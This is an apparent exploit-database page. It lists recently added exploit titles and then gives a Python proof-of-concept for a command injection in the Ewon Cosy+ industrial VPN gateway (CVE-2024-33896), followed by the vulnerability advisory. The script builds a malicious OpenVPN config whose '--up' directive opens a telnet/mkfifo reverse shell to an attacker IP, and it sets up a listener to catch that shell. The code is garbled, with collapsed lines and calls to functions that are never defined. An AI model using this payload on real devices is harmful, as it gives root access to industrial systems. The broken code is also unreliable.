60175c9963
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
51 lines
No EOL
2.2 KiB
Python
Executable file
51 lines
No EOL
2.2 KiB
Python
Executable file
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
|
|
# Google Dork: N/A
|
|
# Date: 2024-8-20
|
|
# Exploit Author: CodeB0ss
|
|
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
|
|
# Version: 21.2s7
|
|
# Tested on: Windows 11 Home Edition
|
|
# CVE: CVE-2024-33896
|
|
|
|
|
|
import socket
|
|
import subprocess
|
|
import time
|
|
|
|
def configcreator(file_path):
|
|
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
|
|
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
|
|
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
|
|
l3st(port): server_socket = socket.socket(socket.AF_INET,
|
|
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
|
|
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
|
|
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
|
|
True: data = client_socket.recv(1024) if not data: break
|
|
print(data.decode()) client_socket.close() server_socket.close() if name ==
|
|
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
|
|
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
|
|
import start_listener; start_listener({port})']) time.sleep(2)
|
|
create_malicious_openvpn_config(config) print(f" - --> config_created
|
|
{config}")
|
|
|
|
|
|
GitHub:
|
|
https://github.com/codeb0ss/CVE-2024-33896-PoC
|
|
|
|
Hey,
|
|
|
|
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
|
|
maintenance in industrial environments. The manufacturer describes the
|
|
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
|
|
VPN connection between the machine (PLC, HMI, or other devices) and the
|
|
remote engineer. The connection happens through Talk2m, a highly secured
|
|
industrial cloud service. The Ewon Cosy+ makes industrial remote access
|
|
easy and secure like never before!" Due to improper neutralization of
|
|
parameters read from a user-controlled configuration file, an authenticated
|
|
attacker is able to inject and execute OS commands on the device.
|
|
|
|
Vulnerability Details: Authenticated attackers are able to upload a custom
|
|
OpenVPN configuration. This configuration can contain the OpenVPN
|
|
paramaters "--up" and "--down", which execute a specified script or
|
|
executable. Since the process itself runs with the highest privileges
|
|
(root), this allows the device to be completely compromised. |